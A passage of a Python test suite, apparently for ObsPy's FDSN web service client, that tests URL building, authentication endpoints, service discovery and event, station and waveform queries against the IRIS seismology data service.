\"http://service.iris.edu/fdsnws/station/1/query?location=%2A\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"A?\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?location=A%3F\"\n\n # lists are valid, including <space><space> lists. Again encoded\n # result.\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \" ,1?,?0\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=--%2C1%3F%2C%3F0\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"1?,--,?0\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=1%3F%2C--%2C%3F0\"\n\n # Test all three special cases with empty parameters into lists.\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \" ,AA,BB\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=--%2CAA%2CBB\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"AA, ,BB\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=AA%2C--%2CBB\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"AA,BB, \"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=AA%2CBB%2C--\"\n\n # The location parameter is also passed through the\n # _create_url_from_parameters() method and thus has to survive it!\n # This guards against a regression where all empty location codes\n # where removed by this function!\n for service in [\"station\", \"dataselect\"]:\n for loc in [\"\", \" \", \" \", \"--\", b\"\", b\" \", b\" \", b\"--\",\n u\"\", u\" \", u\" \", u\"--\"]:\n assert \"location=--\" in \\\n self.client._create_url_from_parameters(\n service, [],\n {\"location\": loc, \"starttime\": 0, \"endtime\": 1})\n\n # Also check the full call with a mock test.\n for loc in [\"\", \" \", \" \", \"--\", b\"\", b\" \", b\" \", b\"--\",\n u\"\", u\" \", u\" \", u\"--\"]:\n with mock.patch(\"obspy.clients.fdsn.Client._download\") as p:\n self.client.get_stations(0, 0, location=loc,\n filename=mock.Mock())\n assert p.call_count == 1\n assert \"location=--\" in p.call_args[0][0]\n with mock.patch(\"obspy.clients.fdsn.Client._download\") as p:\n self.client.get_waveforms(1, 2, loc, 4, 0, 0,\n filename=mock.Mock())\n assert p.call_count == 1\n assert \"location=--\" in p.call_args[0][0]\n\n def test_url_building_with_auth(self):\n \"\"\"\n Tests the Client._build_url() method with authentication.\n\n Necessary on top of test_url_building test case because clients with\n authentication have to build different URLs for dataselect.\n \"\"\"\n # no authentication\n got = self.client._build_url(\"dataselect\", \"query\", {'net': \"BW\"})\n expected = \"http://service.iris.edu/fdsnws/dataselect/1/query?net=BW\"\n assert got == expected\n # with authentication\n got = self.client_auth._build_url(\"dataselect\", \"query\", {'net': \"BW\"})\n expected = (\"http://service.iris.edu/fdsnws/dataselect/1/\"\n \"queryauth?net=BW\")\n assert got == expected\n\n def test_set_credentials(self):\n \"\"\"\n Test for issue #2146\n\n When setting credentials not during `__init__` but using\n `set_credentials`, waveform queries should still properly go to\n \"queryauth\" endpoint.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT)\n user = \"nobody@iris.edu\"\n password = \"anonymous\"\n client.set_credentials(user=user, password=password)\n got = client._build_url(\"dataselect\", \"query\", {'net': \"BW\"})\n expected = (\"http://service.iris.edu/fdsnws/dataselect/1/\"\n \"queryauth?net=BW\")\n assert got == expected\n # more basic test: check that set_credentials has set Client.user\n # (which is tested when checking which endpoint to use, query or\n # queryauth)\n assert client.user == user\n\n @pytest.mark.skip(reason='data no longer available')\n def test_trim_stream_after_get_waveform(self):\n \"\"\"\n Tests that stream is properly trimmed to user requested times after\n fetching from datacenter, see #1887\n \"\"\"\n c = Client(\n service_mappings={'dataselect':\n 'http://ws.ipgp.fr/fdsnws/dataselect/1'})\n starttime = UTCDateTime('2016-11-01T00:00:00')\n endtime = UTCDateTime('2016-11-01T00:00:10')\n stream = c.get_waveforms('G', 'PEL', '*', 'LHZ', starttime, endtime)\n assert starttime == stream[0].stats.starttime\n assert endtime == stream[0].stats.endtime\n\n def test_service_discovery_iris(self):\n \"\"\"\n Tests the automatic discovery of services with the IRIS endpoint. The\n test parameters are taken from IRIS' website.\n\n This will have to be adjusted once IRIS changes their implementation.\n \"\"\"\n client = self.client\n assert {*client.services.keys()} == \\\n {\"dataselect\", \"event\", \"station\", \"available_event_contributors\",\n \"available_event_catalogs\"}\n\n # The test sets are copied from the IRIS webpage.\n assert {*client.services[\"dataselect\"].keys()} == \\\n {\"starttime\", \"endtime\", \"network\", \"station\", \"location\",\n \"channel\", \"quality\", \"minimumlength\", \"longestonly\"}\n assert {*client.services[\"station\"].keys()} == \\\n {\"starttime\", \"endtime\", \"startbefore\", \"startafter\",\n \"endbefore\", \"endafter\", \"network\", \"station\", \"location\",\n \"channel\", \"minlatitude\", \"maxlatitude\", \"minlongitude\",\n \"maxlongitude\", \"latitude\", \"longitude\", \"minradius\",\n \"maxradius\", \"level\", \"includerestricted\", \"format\",\n \"includeavailability\", \"updatedafter\", \"matchtimeseries\"}\n assert {*client.services[\"event\"].keys()} == \\\n {\"starttime\", \"endtime\", \"minlatitude\", \"maxlatitude\",\n \"minlongitude\", \"maxlongitude\", \"latitude\", \"longitude\",\n \"maxradius\", \"minradius\", \"mindepth\", \"maxdepth\",\n \"minmagnitude\", \"maxmagnitude\",\n \"magnitudetype\", \"format\",\n \"catalog\", \"contributor\", \"limit\", \"offset\", \"orderby\",\n \"updatedafter\", \"includeallorigins\", \"includeallmagnitudes\",\n \"includearrivals\", \"eventid\",\n \"originid\"} # XXX: This is currently just specified in the WADL\n\n # Also check an exemplary value in more detail.\n minradius = client.services[\"event\"][\"minradius\"]\n assert minradius[\"default_value\"] == 0.0\n assert not minradius[\"required\"]\n assert minradius[\"doc\"] == \"\"\n assert minradius[\"doc_title\"] == (\n \"Specify minimum distance from the geographic point defined by \"\n \"latitude and longitude\")\n assert minradius[\"type\"] == float\n assert minradius[\"options\"] == []\n\n def test_iris_event_catalog_availability(self):\n \"\"\"\n Tests the parsing of the available event catalogs.\n \"\"\"\n assert {*self.client.services[\"available_event_catalogs\"]} == \\\n {\"GCMT\", \"ISC\", \"NEIC PDE\"}\n\n def test_iris_event_contributors_availability(self):\n \"\"\"\n Tests the parsing of the available event contributors.\n \"\"\"\n response = requests.get(\n 'http://service.iris.edu/fdsnws/event/1/contributors')\n xml = lxml.etree.fromstring(response.content)\n expected = {\n elem.text for elem in xml.xpath('/Contributors/Contributor')}\n # check that we have some values in there\n assert len(expected) > 5\n assert {*self.client.services[\"available_event_contributors\"]} == \\\n expected\n\n def test_discover_services_defaults(self):\n \"\"\"\n A Client initialized with _discover_services=False shouldn't perform\n any services/WADL queries on the endpoint, and should show only the\n default service parameters.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n assert client.services == DEFAULT_SERVICES\n\n def test_simple_xml_parser(self):\n \"\"\"\n Tests the simple XML parsing helper function.\n \"\"\"\n catalogs = parse_simple_xml(\"\"\"\n <?xml version=\"1.0\"?>\n <Catalogs>\n <total>6</total>\n <Catalog>ANF</Catalog>\n <Catalog>GCMT</Catalog>\n <Catalog>TEST</Catalog>\n <Catalog>ISC</Catalog>\n <Catalog>UofW</Catalog>\n <Catalog>NEIC PDE</Catalog>\n </Catalogs>\"\"\")\n assert catalogs == {\"catalogs\": set(\n (\"ANF\", \"GCMT\", \"TEST\", \"ISC\", \"UofW\", \"NEIC PDE\"))}\n\n def test_iris_example_queries_event(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on the IRIS\n web page.\n\n Used to be tested against files but that was not maintainable. It\n now tests if the queries return what was asked for.\n \"\"\"\n client = self.client\n\n # Event id query.\n cat = client.get_events(eventid=609301)\n assert len(cat) == 1\n assert \"609301\" in cat[0].resource_id.id\n\n # Temporal query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"), catalog=\"ISC\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].extra.catalog.value == \"ISC\"\n assert event.origins[0].time > UTCDateTime(\"2001-01-07T01:00:00\")\n assert UTCDateTime(\"2001-01-07T01:05:00\") > event.origins[0].time\n\n # Misc query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T14:00:00\"),\n endtime=UTCDateTime(\"2001-01-08T00:00:00\"), minlatitude=15,\n maxlatitude=40, minlongitude=-170, maxlongitude=170,\n includeallmagnitudes=True, minmagnitude=4, orderby=\"magnitude\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].time > \\\n UTCDateTime(\"2001-01-07T14:00:00\")\n assert UTCDateTime(\"2001-01-08T00:00:00\") > event.origins[0].time\n assert event.origins[0].latitude > 14.9\n assert 40.1 > event.origins[0].latitude\n assert event.origins[0].latitude > -170.1\n assert 170.1 > event.origins[0].latitude\n # events returned by FDSNWS can contain many magnitudes with a wide\n # range, and currently (at least for IRIS) the magnitude threshold\n # sent to the server checks if at least one magnitude matches, it\n # does not only check the preferred magnitude..\n assert any(m.mag >= 3.999 for m in event.magnitudes)\n\n @pytest.mark.filterwarnings('ignore:.*cannot deal with')\n def test_irisph5_event(self):\n \"\"\"\n Tests the IRISPH5 URL mapping, which is special due to its custom\n subpath.\n \"\"\"\n client = Client('IRISPH5')\n\n # Event id query.\n cat = client.get_events(catalog='8A')\n assert len(cat) == 19\n assert cat[0].event_type == 'controlled explosion'\n\n def test_iris_example_queries_station(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage.\n\n This test used to download files but that is almost impossible to\n keep up to date - thus it is now a bit smarter and tests the\n returned inventory in different ways.\n \"\"\"\n client = self.client\n\n # Radial query.\n inv = client.get_stations(latitude=-56.1, longitude=-26.7,\n maxradius=15)\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n dist = locations2degrees(sta.latitude, sta.longitude,\n -56.1, -26.7)\n # small tolerance for WGS84.\n assert 15.1 > dist, \"%s.%s\" % (net.code, sta.code)\n\n # Misc query.\n inv = client.get_stations(\n startafter=UTCDateTime(\"2003-01-07\"),\n endbefore=UTCDateTime(\"2011-02-07\"), minlatitude=15,\n maxlatitude=55, minlongitude=170, maxlongitude=-170, network=\"IM\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n msg = \"%s.%s\" % (net.code, sta.code)\n assert sta.start_date > UTCDateTime(\"2003-01-07\"), msg\n if sta.end_date is not None:\n assert UTCDateTime(\"2011-02-07\") > sta.end_date, \\\n msg\n assert sta.latitude > 14.9, msg\n assert 55.1 > sta.latitude, msg\n assert not (-170.1 <= sta.longitude <= 170.1), msg\n assert net.code == \"IM\", msg\n\n # Simple query\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"), net=\"IU\", sta=\"ANMO\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2001-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code == \"ANMO\"\n\n # Station wildcard query.\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2002-01-01\"), network=\"IU\", sta=\"A*\",\n location=\"00\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2002-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code.startswith(\"A\")\n\n def test_iris_example_queries_dataselect(self, testdata):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage.\n \"\"\"\n client = self.client\n\n queries = [\n (\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:40:00.000\")),\n (\"IU\", \"A*\", \"*\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n (\"IU\", \"A??\", \"*0\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n ]\n result_files = [\"dataselect_example.mseed\",\n \"dataselect_example_wildcards.mseed\",\n \"dataselect_example_mixed_wildcards.mseed\",\n ]\n for query, filename in zip(queries, result_files):\n # test output to stream\n got = client.get_waveforms(*query)\n # Assert that the meta-information about the provider is stored.\n for tr in got:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/query\"\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n expected = read(testdata[filename])\n # The client trims by default.\n _normalize_stats(got)\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms(*query, filename=tf.name)\n with open(tf.name, 'rb') as fh:\n got = fh.read()\n with open(testdata[filename], 'rb') as fh:\n expected = fh.read()\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n\n def test_authentication(self, testdata):\n \"\"\"\n Test dataselect with authentication.\n \"\"\"\n client = self.client_auth\n # dataselect example queries\n query = (\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:40:00.000\"))\n got = client.get_waveforms(*query)\n expected = read(testdata[\"dataselect_example.mseed\"])\n _normalize_stats(got)\n assert got == expected, failmsg(got, expected)\n\n def test_iris_example_queries_event_discover_services_false(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on the IRIS\n web page, without service discovery.\n\n Used to be tested against files but that was not maintainable. It\n now tests if the queries return what was asked for.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n\n # Event id query.\n cat = client.get_events(eventid=609301)\n assert len(cat) == 1\n assert \"609301\" in cat[0].resource_id.id\n\n # Temporal query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"), catalog=\"ISC\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].extra.catalog.value == \"ISC\"\n assert event.origins[0].time > UTCDateTime(\"2001-01-07T01:00:00\")\n assert UTCDateTime(\"2001-01-07T01:05:00\") > event.origins[0].time\n\n # Misc query.\n cat = client.get_events(\n starttime=UTCDateTime(\"2001-01-07T14:00:00\"),\n endtime=UTCDateTime(\"2001-01-08T00:00:00\"), minlatitude=15,\n maxlatitude=40, minlongitude=-170, maxlongitude=170,\n includeallmagnitudes=True, minmagnitude=4, orderby=\"magnitude\")\n assert len(cat) > 0\n for event in cat:\n assert event.origins[0].time > \\\n UTCDateTime(\"2001-01-07T14:00:00\")\n assert UTCDateTime(\"2001-01-08T00:00:00\") > event.origins[0].time\n assert event.origins[0].latitude > 14.9\n assert 40.1 > event.origins[0].latitude\n assert event.origins[0].latitude > -170.1\n assert 170.1 > event.origins[0].latitude\n # events returned by FDSNWS can contain many magnitudes with a wide\n # range, and currently (at least for IRIS) the magnitude threshold\n # sent to the server checks if at least one magnitude matches, it\n # does not only check the preferred magnitude..\n assert any(m.mag >= 3.999 for m in event.magnitudes)\n\n def test_iris_example_queries_station_discover_services_false(self):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage,\n without service discovery.\n\n This test used to download files but that is almost impossible to\n keep up to date - thus it is now a bit smarter and tests the\n returned inventory in different ways.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n\n # Radial query.\n inv = client.get_stations(latitude=-56.1, longitude=-26.7,\n maxradius=15)\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n dist = locations2degrees(sta.latitude, sta.longitude,\n -56.1, -26.7)\n # small tolerance for WGS84.\n assert 15.1 > dist, \"%s.%s\" % (net.code, sta.code)\n\n # Misc query.\n inv = client.get_stations(\n startafter=UTCDateTime(\"2003-01-07\"),\n endbefore=UTCDateTime(\"2011-02-07\"), minlatitude=15,\n maxlatitude=55, minlongitude=170, maxlongitude=-170, network=\"IM\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n msg = \"%s.%s\" % (net.code, sta.code)\n assert sta.start_date > UTCDateTime(\"2003-01-07\"), msg\n if sta.end_date is not None:\n assert UTCDateTime(\"2011-02-07\") > sta.end_date, \\\n msg\n assert sta.latitude > 14.9, msg\n assert 55.1 > sta.latitude, msg\n assert not (-170.1 <= sta.longitude <= 170.1), msg\n assert net.code == \"IM\", msg\n\n # Simple query\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"), net=\"IU\", sta=\"ANMO\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2001-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code == \"ANMO\"\n\n # Station wildcard query.\n inv = client.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2002-01-01\"), network=\"IU\", sta=\"A*\",\n location=\"00\")\n assert len(inv.networks) > 0 # at least one network\n for net in inv:\n assert len(net.stations) > 0 # at least one station\n for sta in net:\n assert UTCDateTime(\"2002-01-01\") > sta.start_date\n if sta.end_date is not None:\n assert sta.end_date > UTCDateTime(\"2000-01-01\")\n assert net.code == \"IU\"\n assert sta.code.startswith(\"A\")\n\n def test_iris_example_queries_dataselect_discover_services_false(\n self, testdata):\n \"\"\"\n Tests the (sometimes modified) example queries given on IRIS webpage,\n without discovering services first.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n _discover_services=False)\n\n queries = [\n (\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:40:00.000\")),\n (\"IU\", \"A*\", \"*\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n (\"IU\", \"A??\", \"*0\", \"BHZ\",\n UTCDateTime(\"2010-02-27T06:30:00.000\"),\n UTCDateTime(\"2010-02-27T06:31:00.000\")),\n ]\n result_files = [\"dataselect_example.mseed\",\n \"dataselect_example_wildcards.mseed\",\n \"dataselect_example_mixed_wildcards.mseed\",\n ]\n for query, filename in zip(queries, result_files):\n # test output to stream\n got = client.get_waveforms(*query)\n # Assert that the meta-information about the provider is stored.\n for tr in got:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/query\"\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n expected = read(testdata[filename])\n _normalize_stats(got)\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms(*query, filename=tf.name)\n with open(tf.name, 'rb') as fh:\n got = fh.read()\n with open(testdata[filename], 'rb') as fh:\n expected = fh.read()\n assert got == expected, \\\n \"Dataselect failed for query %s\" % repr(query)\n\n def test_conflicting_params(self):\n \"\"\"\n \"\"\"\n with pytest.raises(FDSNInvalidRequestException):\n self.client.get_stations(network=\"IU\", net=\"IU\")\n\n def test_help_function_with_iris(self, testdata):\n \"\"\"\n Tests the help function with the IRIS example.\n\n This will have to be adopted any time IRIS changes their\n implementation.\n \"\"\"\n try:\n client = self.client\n\n # Capture output\n tmp = io.StringIO()\n sys.stdout = tmp\n\n client.help(\"event\")\n got = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n tmp.close()\n filename = \"event_helpstring.txt\"\n with open(testdata[filename]) as fh:\n expected = fh.read()\n # allow for changes in version number..\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n # catalogs/contributors are checked in separate tests\n assert got[-2].startswith('Available catalogs:')\n assert got[-1].startswith('Available contributors:')\n got = got[:-2]\n expected = expected[:-2]\n for line_got, line_expected in zip(got, expected):\n assert line_got == line_expected\n\n # Reset. Creating a new one is faster then clearing the old one.\n tmp = io.StringIO()\n sys.stdout = tmp\n\n client.help(\"station\")\n got = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n tmp.close()\n\n filename = \"station_helpstring.txt\"\n with open(testdata[filename]) as fh:\n expected = fh.read()\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n assert got == expected, failmsg(got, expected)\n\n # Reset.\n tmp = io.StringIO()\n sys.stdout = tmp\n\n client.help(\"dataselect\")\n got = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n tmp.close()\n\n filename = \"dataselect_helpstring.txt\"\n with open(testdata[filename]) as fh:\n expected = fh.read()\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n assert got == expected, failmsg(got, expected)\n\n finally:\n sys.stdout = sys.__stdout__\n\n def test_str_method(self):\n got = str(self.client)\n expected = (\n \"FDSN Webservice Client (base url: http://service.iris.edu)\\n\"\n \"Available Services: 'dataselect' (v1.0.0), 'event' (v1.0.6), \"\n \"'station' (v1.0.7), 'available_event_catalogs', \"\n \"'available_event_contributors'\\n\\n\"\n \"Use e.g. client.help('dataselect') for the\\n\"\n \"parameter description of the individual services\\n\"\n \"or client.help() for parameter description of\\n\"\n \"all webservices.\")\n got = normalize_version_number(got)\n expected = normalize_version_number(expected)\n assert got == expected, failmsg(got, expected)\n\n def test_dataselect_bulk(self, testdata):\n \"\"\"\n Test bulk dataselect requests, POSTing data to server. Also tests\n authenticated bulk request.\n \"\"\"\n clients = [self.client, self.client_auth]\n expected = read(testdata[\"bulk.mseed\"])\n # test cases for providing lists of lists\n # Deliberately requesting data that overlap the end-time of a channel.\n # TA.A25A..BHZ ends at 2011-07-22T14:50:25.5\n bulk = ((\"TA\", \"A25A\", \"\", \"BHZ\",\n UTCDateTime(\"2011-07-22T14:50:23\"),\n UTCDateTime(\"2011-07-22T14:50:29\")),\n (\"TA\", \"A25A\", \"\", \"BHE\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:06\")),\n (\"IU\", \"ANMO\", \"*\", \"HHZ\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:08\")))\n # As of 03 December 2018, it looks like IRIS is ignoring minimumlength?\n params = dict(quality=\"B\", longestonly=False, minimumlength=5)\n for client in clients:\n # test output to stream\n got = client.get_waveforms_bulk(bulk, **params)\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms_bulk(bulk, filename=tf.name, **params)\n got = read(tf.name)\n assert got == expected, failmsg(got, expected)\n # test cases for providing a request string\n bulk = (\"quality=B\\n\"\n \"longestonly=false\\n\"\n \"minimumlength=5\\n\"\n \"TA A25A -- BHZ 2010-03-25T00:00:00 2010-03-25T00:00:04\\n\"\n \"TA A25A -- BHE 2010-03-25T00:00:00 2010-03-25T00:00:06\\n\"\n \"IU ANMO * HHZ 2010-03-25T00:00:00 2010-03-25T00:00:08\\n\")\n for client in clients:\n # test output to stream\n got = client.get_waveforms_bulk(bulk)\n # Assert that the meta-information about the provider is stored.\n for tr in got:\n if client.user:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/queryauth\"\n else:\n assert tr.stats._fdsnws_dataselect_url == \\\n client.base_url + \"/fdsnws/dataselect/1/query\"\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n # test output to file\n with NamedTemporaryFile() as tf:\n client.get_waveforms_bulk(bulk, filename=tf.name)\n got = read(tf.name)\n assert got == expected, failmsg(got, expected)\n # test cases for providing a file name\n for client in clients:\n with NamedTemporaryFile() as tf:\n with open(tf.name, \"wt\") as fh:\n fh.write(bulk)\n got = client.get_waveforms_bulk(bulk)\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n # test cases for providing a file-like object\n for client in clients:\n got = client.get_waveforms_bulk(io.StringIO(bulk))\n # Remove fdsnws URL as it is not in the data from the disc.\n for tr in got:\n del tr.stats._fdsnws_dataselect_url\n assert got == expected, failmsg(got, expected)\n\n def test_station_bulk(self):\n \"\"\"\n Test bulk station requests, POSTing data to server. Also tests\n authenticated bulk request.\n\n Does currently only test reading from a list of list. The other\n input types are tested with the waveform bulk downloader and thus\n should work just fine.\n \"\"\"\n clients = [self.client, self.client_auth]\n # test cases for providing lists of lists\n starttime = UTCDateTime(1990, 1, 1)\n endtime = UTCDateTime(1990, 1, 1) + 10\n bulk = [\n [\"IU\", \"ANMO\", \"\", \"BHE\", starttime, endtime],\n [\"IU\", \"CCM\", \"\", \"BHZ\", starttime, endtime],\n [\"IU\", \"COR\", \"\", \"UHZ\", starttime, endtime],\n [\"IU\", \"HRV\", \"\", \"LHN\", starttime, endtime],\n ]\n for client in clients:\n # Test with station level.\n inv = client.get_stations_bulk(bulk, level=\"station\")\n # Test with output to file.\n with NamedTemporaryFile() as tf:\n client.get_stations_bulk(\n bulk, filename=tf.name, level=\"station\")\n inv2 = read_inventory(tf.name, format=\"stationxml\")\n\n assert inv.networks == inv2.networks\n assert len(inv.networks) == 1\n assert inv[0].code == \"IU\"\n assert len(inv.networks[0].stations) == 4\n assert sorted([_i.code for _i in inv.networks[0].stations]) == \\\n sorted([\"ANMO\", \"CCM\", \"COR\", \"HRV\"])\n\n # Test with channel level.\n inv = client.get_stations_bulk(bulk, level=\"channel\")\n # Test with output to file.\n with NamedTemporaryFile() as tf:\n client.get_stations_bulk(\n bulk, filename=tf.name, level=\"channel\")\n inv2 = read_inventory(tf.name, format=\"stationxml\")\n\n assert inv.networks == inv2.networks\n assert len(inv.networks) == 1\n assert inv[0].code == \"IU\"\n assert len(inv.networks[0].stations) == 4\n assert sorted([_i.code for _i in inv.networks[0].stations]) == \\\n sorted([\"ANMO\", \"CCM\", \"COR\", \"HRV\"])\n channels = []\n for station in inv[0]:\n for channel in station:\n channels.append(\"IU.%s.%s.%s\" % (\n station.code, channel.location_code,\n channel.code))\n assert sorted(channels) == \\\n sorted([\"IU.ANMO..BHE\", \"IU.CCM..BHZ\", \"IU.COR..UHZ\",\n \"IU.HRV..LHN\"])\n return\n\n def test_get_waveform_attach_response(self):\n \"\"\"\n minimal test for automatic attaching of metadata\n \"\"\"\n client = self.client\n\n bulk = (\"IU ANMO 00 BHZ 2000-03-25T00:00:00 2000-03-25T00:00:04\\n\")\n st = client.get_waveforms_bulk(bulk, attach_response=True)\n for tr in st:\n assert isinstance(tr.stats.get(\"response\"), Response)\n\n st = client.get_waveforms(\"IU\", \"ANMO\", \"00\", \"BHZ\",\n UTCDateTime(\"2000-02-27T06:00:00.000\"),\n UTCDateTime(\"2000-02-27T06:00:05.000\"),\n attach_response=True)\n for tr in st:\n assert isinstance(tr.stats.get(\"response\"), Response)\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_default_requested_urls(self, download_url_mock):\n \"\"\"\n Five request should be sent upon initializing a client. Test these.\n \"\"\"\n download_url_mock.return_value = (404, None)\n base_url = \"http://example.com\"\n\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url)\n except FDSNException:\n pass\n\n expected_urls = sorted([\n \"%s/fdsnws/event/1/contributors\" % base_url,\n \"%s/fdsnws/event/1/catalogs\" % base_url,\n \"%s/fdsnws/event/1/application.wadl\" % base_url,\n \"%s/fdsnws/station/1/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/1/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n\n assert expected_urls == got_urls\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_setting_service_major_version(self, download_url_mock):\n \"\"\"\n Test the setting of custom major versions.\n \"\"\"\n download_url_mock.return_value = (404, None)\n base_url = \"http://example.com\"\n\n # Passing an empty dictionary results in the default urls.\n major_versions = {}\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, major_versions=major_versions)\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/1/contributors\" % base_url,\n \"%s/fdsnws/event/1/catalogs\" % base_url,\n \"%s/fdsnws/event/1/application.wadl\" % base_url,\n \"%s/fdsnws/station/1/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/1/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n # Replace all\n download_url_mock.reset_mock()\n download_url_mock.return_value = (404, None)\n major_versions = {\"event\": 7, \"station\": 8, \"dataselect\": 9}\n # An exception will be raised if not actual WADLs are returned.\n 